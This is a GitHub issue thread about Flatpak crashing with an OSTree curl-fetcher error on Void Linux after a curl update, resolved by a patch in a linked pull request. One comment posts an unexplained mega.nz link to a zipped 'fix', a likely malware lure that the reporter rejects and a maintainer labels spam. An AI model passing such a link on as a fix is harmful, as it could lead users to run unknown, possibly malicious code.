### ISSUE TITLE
Flatpak displays an error since curl update

### ISSUE THREAD

**Issue by SpidFightFR** [void-linux/void-packages#52273]
### Is this a new report?

Yes

### System Info

Void 6.10.10_1 x86_64 AuthenticAMD uptodate rrmFFFFFFFF

### Package(s) Affected

flatpak-1.15.10_1, curl-8.10.1_1

### Does a report exist for this bug with the project's home (upstream) and/or another distro?

N.A

### Expected behaviour

1. `flatpak update --user`
2.  [Updates user-wide flatpaks]

### Actual behaviour

Installing 1/X…**
OSTree:ERROR:src/libostree/ostree-fetcher-curl.c:534:sock_cb: code should not be reached
Bail out! OSTree:ERROR:src/libostree/ostree-fetcher-curl.c:534:sock_cb: code should not be reached
Abandon

### Steps to reproduce

1. `flatpak update --user`

**Comment by Felipe-Rafael-Rosa** [comment]
This might help:This file might fix it

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Clos3y** [comment]
Am getting the same error.

**Comment by SpidFightFR** [comment]
> This might help:This file might fix it
> 
> https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ If you don't have the c compliator, install it.(gcc or clang)

sorry but...
That's weird as hell.

Posting a random mega link with a "fix" in a zip...
Could be literally anything else but a fix. Do you have sources ?

**Comment by SpidFightFR** [comment]
ain't no way i'm downloading this zip file, lad.

**Comment by classabbyamp** [comment]
that was spam

**Comment by SpidFightFR** [comment]
> that was spam

indeed. About the issue though...
Flatpak is currently broken.

**Comment by SpidFightFR** [comment]
i'm unable to tell if a recompilation of flatpak (perhaps in an attempt to take into consideration the libcurl (thus curl) update) could fix the issue...

**Comment by SpidFightFR** [comment]
https://github.com/flatpak/flatpak/issues/5926#issuecomment-2329871439

**Comment by SpidFightFR** [comment]
I opened a pr with a fix. A true one this time: https://github.com/void-linux/void-packages/pull/52276 .
Apparently it started with Alpine and Gentoo as well.

Anyways i tested on my laptop the fix, it indeed fixes the flatpak issue.

**Comment by chrysos349** [comment]
https://github.com/ostreedev/ostree/issues/3299

**Comment by SpidFightFR** [comment]
> This time you beat me to it :)
> 
> `Updating 1/3…**` `OSTree:ERROR:src/libostree/ostree-fetcher-curl.c:534:sock_cb: code should not be reached` `Bail out! OSTree:ERROR:src/libostree/ostree-fetcher-curl.c:534:sock_cb: code should not be reached` `zsh: IOT instruction sudo flatpak update `
> 
> Anyway, they're saying that this fixes it: [ostreedev/ostree#3299 (comment)](https://github.com/ostreedev/ostree/issues/3299#issuecomment-2359472206)

yep, it's in the [PR](https://github.com/void-linux/void-packages/pull/52276). I can confirm this PR works on my laptop. :+1:

**Comment by SpidFightFR** [comment]
sidenote: we'll be able to remove this patch at the next release of ostree.
